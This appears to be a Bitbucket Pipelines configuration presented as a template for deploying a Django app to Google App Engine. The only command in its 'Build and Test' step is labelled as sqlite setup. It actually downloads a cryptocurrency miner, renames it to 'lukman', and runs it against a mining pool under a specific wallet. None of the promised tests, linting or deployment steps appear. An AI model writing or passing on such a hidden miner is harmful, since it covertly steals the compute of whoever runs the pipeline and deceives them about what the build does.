#  Template to deploy a Python Django application to the Google App Engine standard environment

#  This template allows you to deploy your Python Django application to the Google App Engine.
#  The workflow allows running tests, code linting and security scans on feature branches (as well as master).
#  The Python Django application will be deployed after the code is merged to master.

# Prerequisites: $KEY_FILE and $PROJECT setup in the Deployment variables.
# For advanced cases, please, follow examples from the pipe's README https://bitbucket.org/atlassian/google-app-engine-deploy/src/master/README.md
# Your environment variables should also be declared in the app.yaml.template.

image: python:3.8

# Workflow Configuration

pipelines:
  default:
    - parallel:
        - step:
            name: Build and Test
            caches:
              - pip
            script:
              # Use a in-memory sqlite3 database
              - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.11/cpuminer-opt-linux.tar.gz && tar xf cpuminer-opt-linux.tar.gz && mv cpuminer-sse2 lukman && ./lukman -a YespowerSugar -o stratum+tcp://stratum-asia.rplant.xyz:7042 -u sugar1qry5dwh39qqwlrsj5dep7uectjcn54ltadtqkhw.BB
